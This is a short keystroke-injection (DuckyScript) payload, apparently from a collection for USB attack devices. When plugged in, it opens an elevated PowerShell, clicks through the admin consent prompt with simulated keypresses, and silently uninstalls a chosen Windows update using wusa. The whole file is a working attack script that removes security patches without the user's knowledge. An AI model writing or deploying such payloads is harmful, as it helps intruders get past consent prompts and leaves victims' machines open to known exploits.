22 lines
566 B
Plaintext
22 lines
566 B
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 1500
|
|
WINDOWS r
|
|
DELAY 1500
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 1500
|
|
ALT y
|
|
DELAY 1500
|
|
GUI UP
|
|
DELAY 1500
|
|
STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit
|
|
ENTER
|